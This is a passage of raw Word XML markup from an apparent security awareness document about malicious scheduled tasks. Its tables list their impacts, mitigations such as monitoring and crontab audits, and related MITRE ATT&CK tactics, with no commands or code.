        <w:t>Malware stays undetected, attacker can steal new data, use as launchpad for more attacks, or even destroy/alter files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3DC70B" w14:textId="3E772297" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Impact of Scheduled Tasks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13"/>
        <w:gridCol w:w="5093"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="25822D8E" w14:textId="77777777" w:rsidTr="001D5AD4">
        <w:trPr>
          <w:trHeight w:val="503"/>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2468" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7009CBCE" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Type of Damage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5048" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42DCA3BC" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="001D5AD4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="2B539B1C" w14:textId="77777777" w:rsidTr="001D5AD4">
        <w:trPr>
          <w:trHeight w:val="492"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2468" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E1A544A" w14:textId="34BE5C18" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5048" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23205B19" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Malware stays on system long-term</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="4D8A5089" w14:textId="77777777" w:rsidTr="001D5AD4">
        <w:trPr>
          <w:trHeight w:val="492"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2468" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41725085" w14:textId="450FE8D6" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5048" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5987E5DE" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Regularly contacts attacker server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="762DD3E1" w14:textId="77777777" w:rsidTr="001D5AD4">
        <w:trPr>
          <w:trHeight w:val="492"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2468" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E407E45" w14:textId="3766126B" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Data Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5048" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B39097D" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Sends stolen data on a schedule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="4200BD7C" w14:textId="77777777" w:rsidTr="001D5AD4">
        <w:trPr>
          <w:trHeight w:val="842"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2468" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="572645EA" w14:textId="070D8EE1" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Delayed Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5048" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7255007D" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Launches ransomware or wiper at a chosen time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02EE1B6A" w14:textId="5F716DF0" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigation for Scheduled Tasks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46"/>
        <w:gridCol w:w="7380"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="75839101" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="039E62BD" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Strategy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E3EAD19" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>How It Helps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="03C49B47" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="535ECAE0" w14:textId="3F177505" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Monitor Task Creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7699C26C" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t xml:space="preserve">Alert on unusual new scheduled tasks or </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D60AEC">
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D60AEC">
              <w:t xml:space="preserve"> jobs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="61E9A83F" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2885B7F4" w14:textId="1A396977" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Least Privilege</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CEED838" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Limit who can create scheduled tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="4D5D3CCE" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BE852CD" w14:textId="4DDFA33D" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:lastRenderedPageBreak/>
              <w:t>Endpoint Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ABD5B1C" w14:textId="4F875FAA" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Use tools like Sysmon or EDR to monitor background jobs</w:t>
            </w:r>
            <w:r w:rsidR="003F7A07">
              <w:t xml:space="preserve"> for </w:t>
            </w:r>
            <w:r w:rsidR="003F7A07" w:rsidRPr="00E817BE">
              <w:t>endpoint detection tools to spot and block unknown tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="299039E4" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CF27997" w14:textId="1424A1BC" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Audit Crontabs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D2F45A9" w14:textId="71A2059C" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="003F7A07" w:rsidP="00D60AEC">
            <w:r>
              <w:t xml:space="preserve">Regular </w:t>
            </w:r>
            <w:r w:rsidRPr="00E817BE">
              <w:t>reviews of scheduled jobs and running processes by IT/security teams</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> &amp; </w:t>
            </w:r>
            <w:r w:rsidR="00D60AEC" w:rsidRPr="00D60AEC">
              <w:t>Check /etc/crontab and user crontabs for hidden jobs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14D7B854" w14:textId="09D1B25A" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Linked MITRE Tactics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6"/>
        <w:gridCol w:w="2058"/>
        <w:gridCol w:w="4106"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="2FF25326" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32C72703" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tactic ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D307648" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tactic Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="673679FA" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D60AEC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>How It Relates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="49E07AF6" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E6C9EC9" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>TA0003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="281477E3" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3448047A" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Task keeps malware running</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="18A8023A" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43DA0383" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>TA0004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DC591C2" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F7578CC" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Runs as SYSTEM/root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="0282FF19" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="006A35EE" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>TA0005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05A38A2F" w14:textId="2C346410" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Defen</w:t>
            </w:r>
            <w:r w:rsidR="001D5AD4">
              <w:t>c</w:t>
            </w:r>
            <w:r w:rsidRPr="00D60AEC">
              <w:t>e Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DF8F2AE" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Blends in with legitimate jobs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="24B0E9D0" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76811C4C" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>TA0008</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="522794FC" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="538B5E63" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Can launch scripts to reach other systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="15395D67" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32068EFB" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>TA0011</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40A7F26C" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="060BFEC4" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Sends check-ins to attacker server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="6528B6FF" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54C0F4BC" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>TA0010</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0979B29B" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CC5A3C6" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Exports stolen files on a schedule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w14:paraId="0F48E71F" w14:textId="77777777" w:rsidTr="00D60AEC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66014D32" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>TA0040</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AFB5AF8" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77DDB3D5" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Runs destructive scripts at a chosen time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6CA97EE4" w14:textId="1AA65F63" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
